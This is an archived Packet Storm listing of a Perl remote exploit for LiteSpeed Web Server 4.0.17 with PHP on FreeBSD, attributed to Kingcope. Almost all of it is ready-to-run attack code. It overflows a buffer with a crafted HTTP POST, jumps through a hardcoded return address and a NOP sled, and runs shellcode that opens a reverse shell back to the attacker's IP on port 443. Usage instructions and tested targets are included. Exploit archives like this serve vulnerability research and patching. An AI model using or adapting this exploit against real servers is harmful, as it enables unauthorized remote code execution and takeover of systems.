LiteSpeed Web Server 4.0.17 Remote Exploit

2010-12-10T00:00:00
ID PACKETSTORM:96625
Type packetstorm
Reporter Kingcope
Modified 2010-12-10T00:00:00

Description

                                        
                                            `# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD  
# bug discovered & exploited by Kingcope  
#  
# Dec 2010  
# Lame Xploit Tested with success on   
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86  
# FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86  
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86  
# can be used against the admin interface (port 7080), too  
# Xploit only works on default lsphp binary not the compiled version  
#  
# this should be exploitable on linux too (on the compiled SAPI version)  
# the shipped linux version of lsphp has stack cookies enabled,  
# which could be brute forced if there wasn't a null put at the end of  
# the exploit buffer. The compiled SAPI version is exploitable, but then  
# the offsets differ from box to box, so this time FreeBSD targets only.  
# thus on linux this is very tricky to exploit.  
# this is a proof of concept, don't try this on real boxes  
# see lsapilib.c line 1240  
  
use IO::Socket;  
  
$|=1;  
  
#freebsd reverse shell port 443  
#setup a netcat on this port ^^  
$bsdcbsc =  
# setreuid, no root here  
"\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".  
# connect back :>  
"\x31\xc0\x31\xdb\x53\xb3\x06\x53".  
"\xb3\x01\x53\xb3\x02\x53\x54\xb0".  
"\x61\xcd\x80\x31\xd2\x52\x52\x68".  
"\x41\x41\x41\x41\x66\x68\x01\xbb".  
"\xb7\x02\x66\x53\x89\xe1\xb2\x10".  
"\x52\x51\x50\x52\x89\xc2\x31\xc0".  
"\xb0\x62\xcd\x80\x31\xdb\x39\xc3".  
"\x74\x06\x31\xc0\xb0\x01\xcd\x80".  
"\x31\xc0\x50\x52\x50\xb0\x5a\xcd".  
"\x80\x31\xc0\x31\xdb\x43\x53\x52".  
"\x50\xb0\x5a\xcd\x80\x31\xc0\x43".  
"\x53\x52\x50\xb0\x5a\xcd\x80\x31".  
"\xc0\x50\x68\x2f\x2f\x73\x68\x68".  
"\x2f\x62\x69\x6e\x89\xe3\x50\x54".  
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0".  
"\xb0\x01\xcd\x80";  
  
sub usage() {  
print "written by kingcope\n";  
print "usage:\n".  
"litespeed-remote.pl <target ip/host> <target port> <your ip> <php file on remote host>\n\n".  
"example:\n".  
"perl litespeed-remote.pl 192.168.2.3 8088 192.168.2.2 phpinfo.php\n\n";  
  
exit;  
}  
  
if ($#ARGV ne 3) { usage; }  
  
$target = $ARGV[0];  
$port = $ARGV[1];  
$cbip = $ARGV[2];  
$file = $ARGV[3];  
  
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));  
  
substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);  
  
#my $sock = IO::Socket::INET->new(PeerAddr => $target,  
# PeerPort => 8088,  
# Proto => 'tcp');  
#$a = "A" x 500;  
#print $sock "POST /phpinfo.php HTTP/1.1\r\nHost: 192.168.2.5\r\n\r\n";  
  
#$x = <stdin>;  
  
#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE  
#$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE  
$ret = pack("V", 0x080F40CD); # JMP EDX lsphp  
  
my $sock = IO::Socket::INET->new(PeerAddr => $target,  
PeerPort => $port,  
Proto => 'tcp');  
  
  
$a = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500;  
$sc = "\x90" x 3000 . $bsdcbsc;  
  
print $sock "POST /\x90\x90\x90\x90\x90\x90\xeb\x50/../$file? HTTP/1.1\r\nHost: $target\r\nVVVV: $sc\r\n$a KINGCOPEH4XXU:\r\n\r\n";  
  
while (<$sock>) {  
print;  
}  
`